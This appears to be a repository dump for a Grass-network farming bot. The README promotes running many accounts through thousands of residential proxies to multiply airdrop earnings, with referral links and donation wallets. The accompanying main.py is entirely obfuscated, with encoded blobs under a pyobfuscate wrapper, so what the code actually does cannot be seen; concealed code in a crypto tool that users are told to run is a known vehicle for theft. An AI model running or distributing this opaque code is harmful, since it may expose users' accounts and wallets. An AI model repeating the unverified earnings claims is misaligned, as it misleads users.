5 | Telegram 6 | 7 | 8 | # LATEST: Grass Community Node Bot 1.25x Earnings, Multiple Accounts 🚀 9 | 10 | Automate Grass Node mining with this Python based script for VPS, managing multiple devices and IP addresses to ensure 24/7 uptime and maximize earnings. Perfect for those seeking a seamless and efficient way to handle WebSocket connections through the SOCKS5 Protocol. 11 | 12 | ![AGPL License](https://img.shields.io/badge/License-AGPL%20v3-blue.svg) 13 | 14 | --- 15 | 16 | ## Features ✨ 17 | 18 | - **Season 2 Boost & 1.25x Earnings:** Enjoy enhanced earnings with the latest Season 2 update! 19 | - **WebSocket Connection via SOCKS Proxies:** Securely connect using the SOCKS5 protocol. 20 | - **Multiple User IDs:** Manage several Get Grass accounts simultaneously with multiple proxies. 21 | - **High Earning Potential:** Each proxy (≈ 3000 $GRASS Points per day) maximizes your daily earnings. 22 | - **Cost Efficiency:** As per Stage 1 Airdrop data, 1M Grass Points roughly equals 45 GRASS tokens (Bonus Epooch not included). 23 | - **Data Usage Efficiency:** Approximately 2 GB of proxy data yields 1M points, meaning ~$6 spent on proxies produces around 45 GRASS tokens. 24 | - **Robust Error Handling:** The script automatically manages errors such as dead proxies, SSL errors (e.g., WRONG_VERSION_NUMBER), invalid packed IP addresses, empty connect replies, and internal errors (sent 1011 keepalive). Dead proxies are automatically removed from the file. 25 | 26 | --- 27 | 28 | ## Get Your User ID 🔍 29 | 30 | 1. Open [Get Grass Dashboard](https://app.getgrass.io/register/?referralCode=citNrn5sQAg87PE) and log in. 31 | 2. Press `F12` (or `Ctrl + Shift + I`) to open the developer console. 32 | 3. Enter the following code in the console: 33 | ```javascript 34 | localStorage.getItem('userId') 35 | ``` 36 | 4. The printed text is your **USER_ID**. 37 | 38 | ![User ID Screenshot](https://github.com/user-attachments/assets/ef45b21c-4a13-4853-a4b2-9c1b88b2eaae) 39 | 40 | --- 41 | 42 | ## Requirements ✅ 43 | 44 | - **Get Grass Accounts Invitation:** 45 | [Sign Up Here](https://app.getgrass.io/register/?referralCode=citNrn5sQAg87PE) 46 | - **Python:** 47 | Download from [python.org](https://www.python.org/downloads/) for Windows/Mac or install on Ubuntu: 48 | ```bash 49 | sudo apt install python3 50 | ``` 51 | - **VPS Server:** 52 | Options include AWS free tier, Google Cloud free tier, or any affordable VPS (~$2-5/month). 53 | - **Proxy Server:** 54 | **Important:** Use only ISP Residential Proxies to earn $GRASS tokens; data center or cheap proxies will result in 0% earnings. 55 | - **Recommended Proxy Provider:** 56 | Use [Proxies.fo](https://app.proxies.fo/ref/f1353b58-10c4-98a5-d94d-6164e2efcfaf). Purchase the ISP plan (not the residential plan) for optimal performance. 57 | 58 | --- 59 | 60 | ## If You Want to Buy Proxies From My Recommended Provider 🔒 61 | 62 | 1. **Sign Up:** 63 | Visit [Proxies.fo](https://app.proxies.fo/ref/f1353b58-10c4-98a5-d94d-6164e2efcfaf) and register. 64 | 2. **Go to the ISP Section:** 65 | **DO NOT** buy the Residential Plan—only purchase the ISP plan. 66 | ![ISP Section](https://github.com/user-attachments/assets/c81fc995-11f9-4448-9355-0065d4286cf2) 67 | 3. **Select a Plan:** 68 | Choose one of the ISP plans (avoid the Residential Plan). 69 | ![Plan Selection](https://github.com/user-attachments/assets/bbd22e0a-22c7-42cf-8608-361d7310e0ae) 70 | 4. **Generate SOCKS5 Proxies:** 71 | ![image](https://github.com/user-attachments/assets/51e6e2a4-cccc-47f7-88cb-65548445fcd4) 72 | 73 | Add the generated proxies to the `proxy.txt` file in the following format: 74 | ``` 75 | socks5://username:pass@ip:port 76 | OR 77 | socks://username:pass@ip:port 78 | ``` 79 | 80 | --- 81 | 82 | ## Steps to Run the Code ▶️ 83 | 84 | Before running the script, ensure you have Python installed and all necessary packages. 85 | 86 | 1. **Clone the Repository:** 87 | ```bash 88 | git clone https://github.com/FakerPK/NewGrassBot.git 89 | ``` 90 | 2. **Change Directory:** 91 | ```bash 92 | cd NewGrassBot 93 | ``` 94 | 3. **Install Required Packages:** 95 | ```bash 96 | pip install -r requirements.txt 97 | ``` 98 | 4. **Enter Your User ID and Proxy Count:** 99 | You will be prompted to enter your `UserID` and the number of proxies you wish to use. 100 | 5. **Add Your Proxies:** 101 | Add your proxies to the `proxy.txt` file. You can add 10,000+ proxies! 102 | **Format:** 103 | ```bash 104 | socks5://username:pass@ip:port 105 | OR 106 | socks://username:pass@ip:port 107 | ``` 108 | 7. **Multiple Proxies:** 109 | Each IP is estimated to earn ~3000 $GRASS per day. 110 | 8. **Run the Script:** 111 | ```bash 112 | python3 main.py 113 | ``` 114 | 9. **Multiple User IDs:** 115 | To run multiple User IDs, add them to the `config.json` file. 116 | *Format for `config.json`:* 117 | ```json 118 | { 119 | "user_ids": [ 120 | "USER_ID_1", 121 | "USER_ID_2" 122 | ] 123 | } 124 | ``` 125 | 126 | --- 127 | 128 | ### NOTE: 129 | 130 | Approximately 2GB of proxy data yields about 45 $GRASS tokens (around $90), based on past trends and Stage 1 user data. 131 | 132 | Happy mining and good luck maximizing your earnings! 💰🔥 133 | 134 | *For further assistance or updates, always refer to our Telegram group.* 135 | 136 | --- 137 | ## **💸Donations** 138 | If you would like to support me or the development of this projects, you can make a donation using the following addresses: 139 | - **Solana :** 140 | ```bash 141 | 9SqcZjiUAz9SYBBLwuA9uJG4UzwqC5HNWV2cvXPk3Kro 142 | ``` 143 | - **EVM :** 144 | ```bash 145 | 0x2d550c8A47c60A43F8F4908C5d462184A40922Ef 146 | ``` 147 | - **BTC :** 148 | ```bash 149 | bc1qhx7waktcttam9q9nt0ftdguguwg5lzq5hnasmm 150 | ``` 151 | **TRON** 152 | ```json 153 | TVY97kfPGVBvsyrxtTiHrjXigAakpv9azX 154 | ``` 155 | ---- 156 | ## Support 🆘 157 | Contact `FakerPK` on: 158 |

159 | Telegram 160 | Discord   161 | Medium  162 | 163 | Profile view counter 164 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2025 FakerPK 2 | # Licensed under the AGPL-3.0: https://www.gnu.org/licenses/agpl-3.0.html 3 | # This software is provided "as-is" without any warranties. 4 | pyobfuscate=(lambda getattr:[((lambda IIlII,IlIIl:setattr(__builtins__,IIlII,IlIIl))(IIlII,IlIIl)) for IIlII,IlIIl in getattr.items()]);Il=chr(114)+chr(101);lI=r'[^a-zA-Z0-9]';lIl=chr(115)+chr(117)+chr(98) 5 | pyobfuscate({getattr(__import__(Il),lIl)(lI,'',"https://pyobfuscate.com"):"IlIlIlIllllIlllIIllIllIIlIlIIllIlll",'pyc':"""J;eOf81^OL8PdKD>(5f)U?dc)_zs2`TgMmK28&X7}(|gp-!~W(ehd)_@?L*APfnYA~51EM30zzs+3KJy7b%mYQgCXVu0#fZk&VrF2nE{L^;o0mKS*=7K)82t^I9%leOY?@TJn?36+X(H7TYXyGj0exr$!7C&&vMk?jxls69j;^z{-&35zAw{49Wux7*#|p5tOB9jOu1zD_OgBLV?*>ndyy~XhZg0rPCohBd5B7?4ZbRKQs1wUuQI#PLAP<4VHKXDnrk$_hY~2-cVj695ZzQMJ~n%E#lS(k^tyDTXk(Ic^CIbA9;+c7o}vbWw)=pa?&qv`dD=8_n4P6!jLM+;j+|WADMc!uIFk2{>oU4BIHJeh0M*QC+`0P|F1--_LD0=2AHqwAASNoEzlhi->d~fz2--ykD6T58CWDW^;QAM8avnF)8P@{+}g+>iq{arpE)_Vx?`+k45FtW?BiugVxd~@2+nvQ2Q`4C$~V%9q-Uj4Ex+FlM;2Y|7IvN@|ChJ6Qp79i8(l5-?ir6Cj|~vXg5?1SAm~S1d=z=rl^6aGQe5uhl`okS2i=yM=eXqrV{^uXeJC*+FRG|wV}Is6^3MhVv@;D=4VY4vITgm>*g3DBw6Tvidr|ra>0{Q-_j?qx2I^S=;9`9_9U>BL*$wtQbN(n4YPp>>+m7YWh}K{X&OAeI0+`AXN*^nBY^k<20o!fVV>|`aqyaP)M}t|u>#gjljjcJ90^MnHX4!?cxa#GhY{``CX_z>}!An>~IB66INg=0%CKo~f_w^M#at11oIeH#;d$%uFCVDAW)YD~s&bceIqY4-bi)NV*xXkx_b)n;-eY4X;<>+S*Vba~!pQ#e$wMWk}8r+AuG45-GG3sJ?VM>oR{#1eTl9++;XOI4{?r?O`d*h8jnq7dN^4kZ;eDp6!aCdQhk6dj&+tBPBr7Vm~vy8I!6-Rr}C&hzH#el05#faZrSt8uwTziYMSc|r^GztO<%B+UQGfIHmMd96=DTnKd!wNDKD7Mf@*M*SbY9CHTHnu9{c3ni1t`4|M%ijx$%`V}k?x#Im>$(rvjF^&6nNLSr@w~j6hxT}cGKej_4#tYiYk;bC_t@X1n3$(iP;_Kl8vpw$BF%6AFX`61bJp-{KFOj=uJvRnnvYeRUzh|Bh(RXN25>~P?|iay)^_H@bv8zDHPpV6c59E$D%PW5ee0c+?7Pmf%Gf%_3w1Q^@i)neDCwpAIKTzV5+0-c3?E9g>&j-$J^^yaM|yC`>yBkIdNbOydXr+{c$!jAJJC#_mYG~t1Y})H$_d?C0mz5&l=F?07&m5kCL4{s)?02a?hj$m1UTtfVv2S(Y|yD?oxN6Pa5(dY${}3=`S)m_^DN!mwwYYMJ@J(tQJqJih2@no*P^sGH|sKpb#hVX)NlBmLJqYj*aFGuzP%&pfHHbOduUcKBct@NHt>K@|?APl++|EACv1xGjRb4Apn`UBuB=>>{=<_-*3xrnRpQZ(!h#;BJ>RiyV~LXXXlAk3Atd)%G;H{ojvkAe#-;ic70<_mHM_K5hs0Wp(&c!qm44%IwS6}cDj!@P_w1~Jb8k+UuKPk*?_YoEcf6iLZv*;5q0QcaKx7&fgX5|Ff}BrrlSoQwJr0|BhB88s@1y_ntBNcyY4dUMp6{fNxKMSqHA4Unv8GR(J1%;)n?O-(P+(2o&P^MzcRBNF?RE<8?48)#~yejG`v#BNtsR{wSvj=(R}u7KsiDuMCkQ=f!l|#jF7SOkG06Wjo*ekqs@q6T~RFqk?{`%%xq77qYn2jHtUu{@u;wa(^hj9@5|#&s?l)?^)0482|PM7uF!g4wCbdbCI<*i!U#gBv$cAjPNX5kUeTC2>vdGldpv%-Tlu1A+{u_5s-6IH$16B%shtXsaO*$f%NK^NLM^b|W8`;Dq0Vj73!-PK@>!xb+1%6vg|O{0c>SVkz-nHZlAeZAd2_Ufm?Sfa3zf*JnGR?=?@bQe$Y{(Hg{97XWn@sxQGK~I;qD7L`R)z0>#NFr#p6`zk-1~?HJHC@47$=$lbE0eRt%d+xQ95H-i%Si4U^l<=yRKR|2jC3YJsC_8+^pi9K@?m`c55`rzwrXg#kBWoZ#s${I{2eOCj_dW(8f=PuMgiZ6QWdO5l)CYC3!0WKtrgh9Ej4zgD<&6wl~_;v;F|3g020!8n^fII|7|oc$oi4=8XKjXrg`TkJuPGomog)FZNna=QDh}8eJ@pwtltckBYcnj!MyXBSc4p%PKruB;653exbe?T)VD?&~b8V4?UtoOKtYEK;!z^ZF_<|#4mR|0@jHo5FK(Gb(~pn+d$;VJ2ophBhCPKm9xgS_B&9Y5ao9l&3ZAC0?JWVrQK>-1>VE2J^APMs#P`01n+kzyV-RpjKO=_!um>IaAA8oMU*cREH0`OOmt!DJ`LV*noa=JYvqBsMqoyZ($G)K9G>H{@fdS`TQJ&kJ!6pt%Sv9YLeHJ46`i}k6>^v5g)MdEO_d4{7G00y;I&`yz+qnsUyV!7FJpgVJE`0in}`vFt%q#U;bdoFJv(;KdK$f3@Gv!Ob!5C|Lw2xXDY?Qyg?!sq#2HdZ0pXl+EJ5G({3x!fZ|=hL^TQt9zmfnF)tPU9)8JDaCr}Y&nOb#TR7lQctJ|_G6|B{(@JqyP_tCOP>vz#WnPWI7RX(T*ev>N>xS9?3?7=)qG4Do~9-6f>Jhqh@DRMfX5F1%*mU(<$_GMwnLckfwe`P@kzmd^X-C0LA&Gf1mOGy2FpR>Kokaf+`N54U8VrgB?fB0$-0^N}B2qba!`!eQFu%hYKmr?PKCk?m^gJ(2J?I;UW-_!TSL-5Z@z(^+$di@&B+|5~dx?52eGCnqI=as8pWCR0s@rQXc)$#Nv>{mdD#<^tP+0gB2a#(`v{&n}JWb*p)Wqz>t68&PQ%wp`28j8x=+Cet<%;DFJSy3XfRgblOU8;5s%Tv~Tb_CAE*0mdnh8Oj*suNX0$WP^d-#{=26sA_C;m8_lTq!ZYuEK=b$xnA&(w#Y9zWzA-eF8sb)~L>6`g88#K>doCUXJ?&{Q!{_j(bTOrqPqg53I+iDfzK-#fB&S4P69N18osc@P8QHIjufN#eIIR6|MiEVV#_LTmj}FsMWpb}WYGM?Mnu)sqY+XIwfQ9S?jpQ5X}RB*p|r&3WHj$c!Ggf)>18i9zrrjiK>|j0bsrjVU;1X)hoJ3|3eVqMtWPGn;ACzIk_2$55opac5?mDwRk0SFw0=Cx)X!m|gTTs%S??LuMy{#~O@n3=mq@#6T44kjbEDF77mtOPMORe__SAc1BA?fx>U0HEjSkZsL7!N$b48X0eOJKK|-#~xW=3CrZ+yOLo7^#t?o>~B@4s)U{cGH^C`<4*F3C6+j>9x`CspBXMVz}%Y;BCI-@sr>u~viNl`OOeuOqstIfs_nUHAm3cs!V3f$cdOWDU_*L?&*BA7PY+RsEE=f%{YWQqAVlp8nSJn{O;v5!t*`H;YfYKiu&Zry3Vg_R>rZ)Jl{K~)$g0c&^!t)qlO*s#+pUs(T>{~pJAY8M!3%-D_8j<69KK6!&+j9c(oIq~wNKBC@D}2|{fOp&TEmR)(+E1uOrYsnP@buZ^0u!+2B0oHePX3X30CpwLUao#7oxll)ryRiJ@+;`r$3VMkoXS}MLQVDubC?-8`k>N{_}?zNsvnq`6ZX|AD!H~w?qEHA+*#fn%P_`lhfpS$Doz%apVUX*d@@quN3h@^p2e_x#&sT(Whxwo*0Xw=Iu(@1!_rg*^%2+BrBaS3M2U+pJnb~Fw6USr7pDC)QLQv1~RL@U=7&X%C_66+K<5r`FD>5Y_X>LD3ArWfSj!R#8fsDabCU{B$z{Y?XG`;!gxq5@zl!*y3v_DOjT}PL7|2%y44&2*#yFx$p#j4{{qDQ`HkY?B$y>#cYMy*7_dI(H$2GV<8CaUA2Mp$3W5dZ+KCEVfB_|Cgim4^vXv3Th}V3HSi+ZNzsqq>C6U-;&=!^SmUc{E&j^%5Rh@XF$h;cC70`d5HnDTpAgsI|KnIxLr(teV^ytpE06Cyllalw~jg926Qd}%XWb&i8*o7WAZWD`D;}Jz@a51li)5#n%g?W8TeWt={EW$(_FR!1ofsPF}pXc8P`vkbx-4w{ak0YP7xcY^AjBV-5!OHGm04jal4%{P=knI9)mqIV~*^USd+|D$s@gHIFP>2!zuDIgH3QE4a{@HJ8-gJ(;4FO3i0IC-q}-!dtR#h$ME9=B~&LkSllLKD%QesENMYrTTFbfRQ(R=azLUF(jHpm1j;=S?`bKR<|WmF&I=*BT{JIhN0n|V;S={J8jCu!h#0y9;kxjSdj|5P{>N(@TN?5_bp%n9RWwH`Y<;!iLq{<_cATL$-_ph9}e|e~i!D>I1^N&k5G&r8Rxy`dtT9Z)KQfy8$czN0kfoFpgDJG1L{*zg2lbQP25o^$*I;XbaL_oa--z*)|(Xl#3~prXxi0hJ*xohc_}mG0n%ch1=L(oaL2)!U}dx(nv;rP4OOnzkukR=tge+r5lzwnP$WO2JZfC4zcz`%_XA%_g+0mLrdK>Wu2eMSoLgWP_V(Y{&xD$b~i=HTps_wlXm5+cBjSp-Do>e-@vY24M5c`jf1^(-K=RGJujgNU<5J4bk@PdMa2)Tb-YBP`_Oao49*6(KK_;AZ}kbISrMk?Xda=?c(mUb&@G+!+0${X4(^Jk9Ll820TfXfZ55om@fJqz0tm&+Xp&B4GiAI@T}7C)gJd<3}mBhaOE4odJV1U!3fKZQ9yQ7BddkYYE_OQ_USlf;U4H!gWzs_@JYpi-C>SW5Jw&glHcK0dm0BVWAe#PZ_zz3q2ESF7aOvVyg00{u1h0(o;h{Wrczg;No`OP59z%BM^k$L^sVQ{MU2c>BD!!k3f!=E?z`b8L5}(^w#AWOW)w<;a`R!M#Vw<*z*at-b2$vD;xd3tNVYpbIJL?9>^TKKW7yM%mt$0pxIF7NnrGt1@E`1jJ?fq#_Ep7(ZfxqmGsfu`BUW$HP^0{}Ww8d63Sjp~8+VYj$+Ep>1BoYkm{MXkIg~c%$n;Gl2j_FS#p5uoS@gZ7~xHj7t|C60BX-mTp@g6VND#OY?DwXJ>ijSm;=Xh8}tw1qK4P^G+@-fDW@|#H7$M5UQBgWHHcm&*gV&YPOD7GEagQi6FPW5sl9_DdchA-+ev19yB~W;IQs}Xh7+uI*?@-e0F)*KpsTOavZ<<=V73H@chCY+t|zdLAgoFB`jw8G8;znNqyW8(%&p{2SIM$yPxe>TRIm5k1ZCxIWC~NpjZ-?pr1q(X_)HzG>0y?NJ1EHr&p&$A&}XbFMf_B$rqtMS9YXLz(DV}EHH!}}^7!rEJhWMvVB}SLjTNasUy65EdBZ!a#@`m+PtDEcwF*xMYJG-OgzsOH@g`I6r$;fM^EJ0i{><-#)ySC8qcaV($$!b4^{iU^6_n03tr5K`L!5GAliw?lMg7UnP38u^OM)X+=b&v=*MZ7o%4cT0eZ++W0AZuigh#&W)k(P@lFM!}h?Hqsb>!x8z*pZP@;2CRr3>LM@zfTh~rCgEq!wem#`kK|EvAQ1scF@JBc>n?>4vvTE7TMV&}6Ikxr-+zVopx_y!Yrub`%x8ed-wpIm?k0}IHn=K&?bnCwQD7b=FH{#%C%0E?`k-i8;y>?D%{&0`n5HmSb(xig>hAq3(2ympPbKK;@rNEX!TJdrSQwI^p5Lm{8#sOfmik|U>Gp7c&u_1fRxhWU^B5#wGV9aCP{^vTnmtCESwr-FCgx!-pn!r1r0)=zCz4AGN>8mzdm5ek(;WNDuLe6jvlWl!=5>B|rv*yJ>w@FI}RSbu(KUj-%0t^sLev855Lfi;MN!$Sd4SSMB%_&heGfkl@FSpC;(7D=J=2J$BYF6U5foQmiccTmDPRea%<%^|-nsJ6$OT5lwbhNY>^M$@0A_Zn^P8jO!;vSH>-(nXahP0iv{qRq2>^U8*#P2fI&2#w;lYHFUv?1!Of&Dx#$QozlIWJ8wQQ6d7lDeoW@|0y8QF%}x7;;}t1)Pz0-1|Sum7_V0m8P``;+#cKZkthc_f-DoWybZV`x70jOnQeG+h+Csb++Ma$2=%78@VS4B3DA6o1EL*4!HK+)ZB8ZGORQV;T3**#W;Z}?O?w?g33<{heM*otoXG|tdFcmONgnuQVRZM0%uY3G$kZYTXT3O~2lIWbJdu4Hw}0OpdHS=U_{XoAmX4wu?$(t%>B`ZpOumNyFP`8E{=ygO{}$d5yN`@I84|%$$EfGbfF9~eC`PSmGc?Cj+6n+7EnQ#J+^%;)dS_mU|Kn97zzs5dlxdDz2-v8IyRXa&O%2`JLfn^DLo{VvSNHDsRPNhABM__Hvg0oI2~|{o9k!-O;1G~q_y7d*;VsTo?E9U^WoS*34JG5$nElUhOw+L+Jx6N1tfOJQB?qQ5+UZlpyb^p^09H3bLYYKHH=f1xZF_*VB7{;IP;-&#qPCw*D5*+haU8I^-ml#9CWk(dqf8e~5@{?O)5K5*m^Ynj5hR?^9G^@ND?kIA0ozB|+5?J&V^Xy0;mk)T*|JDBXYt5$suk8n_<*$27-`qZENQDd=??0~90nE>afOXbC#$fyXeq=RU@*J&8yoiA)9GLcv4eXj_VN_w&oQG){DCTE=Vpo5eYFpSsSDKfucMaexUAEZtYuHVDx%{Hpc?toWEFX4MDCy9&o4EMAzHZG$^?to0fFN?%7Kjh(BzTtfi@e^%d}bU&>a(Hw0$O^0n_h4OGS%p8fNM!;YW;ctAkuTp)3-S88xEXdJH29pj%#!cs~oFe^zCo4<_~g{}GN@tQ5vJH;dlo4wHwQ6+m+v?U8I3Hw%&+@Tsb(*xrOTPguJnKONNfh2uA#7^Hq3+9NRw6YF^2D4}38AMl)@52rnhwa0tlm7raZ7W*mMyafj*g+%)(Cls!UNeS|R}X%@rOGLHs!i;XH)k0}eCLmVHl0*w`-+;7P7){g636fvS7W>#Gg}lVXQGI>n(9>;>f_K{R$-?}S2QB$d<6yf}L$q-ozEUsrhm5|A7u)+8JTNNc(i?nN>q43{9tHVen@&={NMQ6uzeIywG(3RW-PrGuV6_%#tz8A>uNmPrtG-$l7Hoa%wdQiRyBJocFPN2m!%Bd*X1L*#n*Je$cep;Di8C(TJZ{+TY9xun^awmVle>4U9)HVdd=;>bzW9Tx8&lmt5pt9-D!g}A&n7X+QVC!}qPLHsQ8>0rvMTdr}b`_I03jTBFnE8KO*1P*-YJLOK58n3I%{3ffOHNvjXe_gfUW3NsaAf{?a3E`aujdhijmGY-f^m*IX;D#LB_xAp2-ilaLDL7HTJ6$9^5N)t+bUBzriOBDDlsnv9GYc~i}-YqM!7A)Jm|t~I^ytc28q6J}50LvlHn@G`DGph@=^Mi&Mr0lsN(V3jzYS~Z?ugDuAg+<|8(3VmaTs~Gai>%T5uBj84-akfQkS)~T(0n2ooJ>%9$?YqTj~wGdC)LLj4-k$a;L8^G)HpE$)GqGgd5?b=O;yfGf5TCDxe;#GX0~zY4vlh3G>DnnVl|HOSH2L#&ORH8HY1ryn+@dgAyAbAUl(W7x01STX4)<2(0G2HSssjQM7x-e}KsQ&V*C;~H9d2mIE#;3Q|1Ro=oimz-dwl^+fB#|0H=2feP*A;rn8ejMQD-t(bYx2TAO@tiFFSij_Ro{W{?SR(U@*&nd|QTF>ui_seXCc-}t3CmQGM!xFQ4(z33d>;1!$reWNgvi2*j8n^oePXz%b4u_(pX})4iC(+Er?fZL3;*!wa)7D2C?c4PfLu~PT^;eU5Yc}qY>sz7;4v77rYsOxn|3RL&nNMef47Cl)T7!LS_jCW=7~o?w52XL_7SoT7N^SHkO!KHU~`?TnDv3Ny}Fc~OM46+dQLk?YTQM1;SgPXCa@;(QTh=nKd?l9kijVnW0;qmugb`1Tq#AdzN+y@CmkSp^v4N0CZZga=d{8Xf=H!+^d|gH2c0l=1Q`PaG=tY$=aBQyYq40E3hgJ~+3hBYf3%DHs(t$~k8Oju=4>kz$1dB+Ga#WB8}P7GWp8&wrGr=rWfIR%CgrMT93A4sQ@v2uDjLQL%k^x#3w*e?I2{lE3Mts(juCH<3JZ8xjDE!u^cDs4-4E)t0?#Z6@HDe#{{6nq;oNC&>%RJA?M%7B%zB0ZbUNi1L;(J2KnA(4B(^SRFpuUhA(_8+g6zeQG#2CMw73XT>5np2(}XJ&X;msvecl`~I2Hm=*Xrb;rE8PvN@%lNm_z&9Um80(DR4^zrnIk-k400@$4srQ=UVyUE@rTbNc!=!`f5rcCr#l5bvmH;Y1gF7#iyhx`n#?t~JQ$*m7aqv@l^MAPc6VmEA-y9gE755N<EYXS^ZTwRSXuezsTSD_*>(dK|XKi+KPiQ1#0&B5I^!m@>e#ZB0VKSV!R&a9O@&AA)rn-!>+xqZ7O^MiD!_Ho%o@ygPO2F0H(S0wg?brXdm-`!V9h(-NBOBZvYSBQsc5^EuBDqaBgTHAXfJ%`&D2eq@}02GW#SgE>+`*0_8qA^#cfbpPOI??HtY8ANciwQl{552nk=EI@NjQKo8a0`q(A88L7hS6r(WUB0NWn!e(4sz>BYytB^c>5w)3=*eyn`v{ND%dbX8?sL`}9ak4{p_vaNf`O7v&Z!8j4a?a(F#WkZVosLgR&c`^a@qjyo+-%O6b}t~cqY)IdQYrT7PwF(opX%a*t*kXv&&n(?gCmPX0_zOdm?B~nlTR{(LsRrqBqy|3C3hj@$#9``@n<8}`D0Dz#=L_~LA1Qb!=K^Nlbd-q^J}cYxsS8uy?m#*=3OD}Qj-;};+B2}I~T!k%l(+ZjrSv)_`XSmiZLJg65-zhL@OYf7?-^t9b44{u|3KozD3;sblG2xH5~M@WwRZ{7l2G""",'pye':"""jE0^Ll+$s@u^p7J=-Miky$D_#;*k3}yV*tXbuR%^_$E!(-`LOm~B4X~#azfM`dl)h_(f$()bCMM8M?mAUN>n|(0Z~XvWNk+rW%BpbO_m_8mE>vLaTvINtd3aSJW;v0i8XmYEVmTBgMCFUBoz;jo5+H*cZl$zSLCPFFdTS1v+9_6g&ZTM=TWTb2*3&eW-xRs-3`O`1y60wNJzwAg5=v`KR_HZo1{+cQb)32qAI`1!s+hlcJDdBklOD&jK5T!=oUS}CXt7=Dxs^!KL}Uj{W}csL`u$LdsZ$qEoNVUTaf;r2-R4T_nF4c$z@acZsH@*Dyn6oWtXbKF;q8%{Qa(oL{Pf5|sNe2W|Qh4ts9XAUmRZAG+NES>%!gB>6ZX&7zM?tlEtcf<-p=BX#x~Z37GIm1N_rf45E(IJ(WCwFLPJ7yMk1P#$j`$V045}n6-!lgv?y7WQZ!9{T225zEYGq2_j`u1YvB&{VS6UaI{nYnOv?4;v(lX5vb&!-Pw3SS^ZKuQ05Dnop}W}O}Y-9p9N>y+nsNl3qr0wruBa8^z5fGMPw-1QJ7rr80jtOdw;=aou{SE<}S!C4-Afv(>z7t3bXxHgkqqj=w@y|y~IDCU*!HE86dxeBQl#*Ab{SmN`65ZBGdogL<=6?sFQQ>Fm@9BgN~p^LhW>?6YGi_2#V~#-?0vCxU2tD%UNho@U4#!CXwkyED~}IW%tI3Pk_PF6n_tji2Gy65OkxIiAf?5n?fe#s8n$n)q;#k0RomLm#9aV=PfU7jGI14B&%sCbB7_h7W#s`W6Kox7(lo+YmOsn$xKP-GlM+-MjOJG)lj|gh@1u33NmzvR8K%wrLjTWtKwKh8vz9A+y3jJl)Ly@C#|XYyYyrzS8uRDIL!yIrdmDy!x6OXOwx^fEbsVJ78>&J&>EzPoiimzM67Ifeo>$uzWUU@?2!DjaqS^0b)$PaDMmD#*eU?;VakStzj?JfX70YuSZ&y~FxSqWTDHb$K9W1K?T&QhWt*e2kskz^m%vavzEI@T0jG5+K>4qQ|{k%cSwx4A_;6-}^szcmWt@-CCe&{EGTU4ZaUm`k7I`FQ_8!QHK>b+Ly%*Im7-6)`X4ZWaeF9s}5LWiFtzeyG@ZQq-D~FSR30)#QcJiDA+kG>G781Icd}nuwTPv9cuiGl>fCX0oqq{q7GZNiuu6x8B*clW7f2{?}c250z$DRPMi#}h7;TU7kD-ho_9fi0aqze9qWVq#`gj#%#JxQ%W>Xs)ywk?$m=uELy22R!+w24=lXA78CF&5YWdBsL_|Lq!-{9RB)7YE#2Hm2*hqMR9)!L3E;9E5UR^q2?W-rD+JusU;10lfB0+DO7SG}aM+gvm$W3qAF-m2hWtTqC&*X33DOP*vK;k8e1HUx)fAuI)1PmGx?AZfXW=WX-H83nqVz7AV08UX--abG|EeVUh3(~AlJ#{9UqW#C{!n4;x{V8NP9As;v^HJ^`;7WgV%X2j7(h7lC%#$9FR$1Xs>vj7L>1;`OZ3gy#WeMx1blSDKd&0^ln1jeY73xcmlV#@6z_@tUM>-)C{ZZvVry-FeY(3g(IyiNUyPx(#^oMZHe1DcA{Ao(dIGU?HFw@QnQr#$v7_lwd+lRcvSXlqXRE3I7ldCxvj@$=7z6L_!0ptg{<*qfe&Zcl?8D+%*Z&Nn&kDp8;Z5N=GE!X?26mV#ppcH>=e6LIUPG+>tSA_d6b8Q!tj-$4r_NZwk@Yvn$ajaMr&E;6Nm^VZ|w5IE_r+)B=It)<^+OvUWRDZPwdWwjk*G}D+5n|FVK?j0@aojG9$VXsH6XY!x`!2UQO~5o$X6qiEA{A8i7d6-hV4fCKfV7CD+EVdo6Z5Q%qP5TLk?OLmlK)=LizkR$?fn5PuPQSHH>~cD*Bgv=T!r9>3i%wGE*;_9aH5cy+#gVs7XRxbaAU>9|1eCd5&tY99~NeP)jmc7V)zRf0%=R8399^gkOv1nFwe9mJ^|HC2&UjNN|B=GvFSy;y>oY6wbkdRr4y8lqs!QY9E^WbSXcsh@#Xvad@dR~<}zyL=#O+;nu0jqt9b9=#_&V-&0(&&Hq5J{sr;HGW5z(E*t&ym_AZSZAMI=Lk9*1|13W?A;28HSdp{o>MoBEK0oG8j=X#E$xM`r+TDT)BAD;=B@R!u)ch!Z;w5ni+nqM>uJ*o}Y>D3T1ErDY+?G}O7{j5uf!bjU27U4hq|Qe-07aH$0#&r#5#goAYZRU%c9OAC36LsP`x!Icp9yHY=v*ejFxhYjog4o+mhJIy~3y?1gk#uksZ#Z>0Q-N)=D}Z+w2z;XI|EBJO-ge$gmpK85-r{UKmNX=~5Gd!!B8+N)4Kq`i87AxED1XhsZXwHj)-bYkv!jMC8VZntCN;-ik{;wU|9I9*}^&>LEaGn+b4=k8XUWW+G3wT2Y;9>abw&0vXAROEEN(*IrdS?Mb~mY=yvP&SjDE_CZY5?;Xy+W=O>$7-tz#a8lZ_P=BjFVoB5Eiq0O_ebCEp@3tHR$LFY%%XH+Ypv_`NvBiXQf!(|!^`WhCsVml#nG4_cO`_Bs(%Xb;_kW0N0k+^f5M-YP|4_E*FDk~)IJut&BZSv%79a3Y)9e_?k#Z(5O0STSMKJ9%y)`Jec7;4!?lOMDMGgJ*Ntz={Z~pZu}3QhWN-`H&kW@hMv6`_(KW&zd)%vlE(7$1M(q=3Tu@EUq_wdwkG^9Te#A--N}&Dy^Z6W^0PH=o7}hYqi~;9Sk>Yx=7`@ZDqi)0*eRf7O4g+c7Pui&^@hr$!mn(JkY~z6Z-6&oVLyUKVYnbB0}MZlL>{I7*7^qxe>-C{Wc_0HvFY$T}KgzWIC`0REGiN(O?U8QPbqe<7OH?}%b_*}d7=Y#U34Z!5y2?rw2qjo99Ak9#1RIxij!pucA30yMn+EkcC=l8X7Lgcho>icL8^WT{7GD5M8W2CQMyb7ZBNO6BNHaapwCL+QqV^m=|{atj1xs&60DEft9!c~>qCcYBOYaZ7x;@4rb#5T)d=<^op<6EGpqtIuRI$EWQvIUj~rOO{1&p+bQkmf85abbI);)`Vom1B|cs0P&<`oZ@lwb>3^Os(*c!02*V&$zzaJ%6aws*i;6HTWc^Zhw<4c2Jw_V76aV